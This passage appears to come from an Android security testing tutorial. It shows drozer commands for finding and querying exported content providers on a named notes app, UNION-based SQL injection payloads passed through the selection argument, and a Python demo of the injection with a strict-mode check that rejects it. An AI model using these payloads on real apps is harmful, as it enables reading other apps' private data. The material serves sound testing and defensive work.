
Improper Error Handling

When error handling is not done properly and the API returns database or server errors that are specific to the crafted request, an attacker can use the information in those errors to craft further attacks.

Content Provider Leakage

According to Google's Android security model, an application cannot share its data with another application unless it is explicitly allowed to. If an application exposes a content:// URI to other applications, it is providing its content to those applications.

Content provider leakage

Drozer can be used to perform various attacks on content providers. First, find the package name of the target application using the commands shown below:

  1. Run app.package.list to list the packages installed on the device:
    #run app.package.list -f {appname}
  2. Run app.package.attacksurface to analyze the attack surface of a specific package (e.g., com.sonyericsson.notes):
    #run app.package.attacksurface com.sonyericsson.notes
  3. Run scanner.provider.finduris to find content provider URIs associated with a package:
    #run scanner.provider.finduris -a [package name]
  4. Example usage of scanner.provider.finduris with a specific package (com.sonyericsson.notes):
    #run scanner.provider.finduris -a com.sonyericsson.notes
  5. Run app.provider.query to query a content provider URI:
    #run app.provider.query [content provider URI]
  6. Example usage of app.provider.query with a specific content provider URI (content://com.sonyericsson.notes.provider):
    #run app.provider.query content://com.sonyericsson.notes.provider
  7. Run app.provider.query with the --vertical option for a vertical view of the results:
    #run app.provider.query [URI] --vertical
  8. Example usage of app.provider.query with a specific URI (content://com.sonyericsson.notes.provider.Note/notes/) and the --vertical option:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --vertical

Attacking SQL Injection using Drozer

  1. Run scanner.provider.injection to scan the content providers of a package for SQL injection:
    #run scanner.provider.injection -a [package name]
  2. Example usage of scanner.provider.injection with a specific package (com.sonyericsson.notes):
    #run scanner.provider.injection -a com.sonyericsson.notes
  3. Run app.provider.query with the --selection option to pass a payload into the provider's selection clause:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --selection "{sqlpayload}"
  4. Example usage with a plain selection that returns a single row:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --selection "_id=1"
  5. Example usage with a UNION-based payload selecting 14 columns from sqlite_master:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --selection "_id=1=1)union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from sqlite_master where (1=1"
  6. The same payload with sqlite_version() in the fifth column, confirming that the injected SELECT is executed:
    #run app.provider.query content://com.sonyericsson.notes.provider.Note/notes/ --selection "_id=1=1)union select 1,2,3,4,sqlite_version(),6,7,8,9,10,11,12,13,14 from sqlite_master where (1=1"
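The provider query above and the --selection injection, as an added Python example that is not part of the original page or of drozer: it rebuilds the WHERE (selection) string that Android's SQLiteQueryBuilder produces over a constructed three-column notes table, shows the page's payload shape (column count reduced from 14 to 3) pulling sqlite_version() out through the UNION, and emulates the extra-parentheses check that SQLiteQueryBuilder.setStrict(true) performs to reject it. The table name, columns and sample rows are assumptions.

```python
import sqlite3

# Constructed sample data: a three-column stand-in for the notes table
# (the page's real target has 14 columns, hence its 1..14 payload).
SAMPLE_NOTES = [(1, "shopping", "milk, eggs"), (2, "private", "door code 4412")]
COLUMNS = "_id, title, body"
# The page's payload shape, with the column count adjusted to this table.
PAYLOAD = "_id=1=1)union select 1,sqlite_version(),3 from sqlite_master where (1=1"

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE notes (_id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.executemany("INSERT INTO notes VALUES (?, ?, ?)", SAMPLE_NOTES)
    return con

def build_query(selection):
    # SQLiteQueryBuilder appends the selection as " WHERE (" + selection + ")".
    # The selection is raw SQL by API design, so the payload's first ')' closes
    # the provider's parenthesis and the rest runs as a UNION.
    return f"SELECT {COLUMNS} FROM notes WHERE ({selection})"

def query_unchecked(con, selection):
    """Exported provider passing --selection straight to the database."""
    return con.execute(build_query(selection)).fetchall()

def selection_is_sane(con, selection):
    """Emulates SQLiteQueryBuilder.setStrict(true): compile the query again with
    the selection in an extra pair of parentheses. A boolean expression still
    compiles; ')union select ...' no longer parses."""
    try:
        con.execute(build_query(f"({selection})"))  # side-effect-free SELECT
        return True
    except sqlite3.OperationalError:
        return False

def query_strict(con, selection):
    if not selection_is_sane(con, selection):
        raise ValueError("rejected selection: " + selection)
    return con.execute(build_query(selection)).fetchall()

def demo():
    con = make_db()
    leaked = query_unchecked(con, PAYLOAD)
    return {
        "leaked_rows": len(leaked),
        "version_leaked": any(r[1] == sqlite3.sqlite_version for r in leaked),
        "strict_accepts_normal": selection_is_sane(con, "_id=1"),
        "strict_accepts_payload": selection_is_sane(con, PAYLOAD),
    }
```

The strict check only stops the selection from breaking out of the WHERE expression; a caller can still supply any boolean expression, so a provider that is not meant to be public should stay unexported or be guarded by a permission.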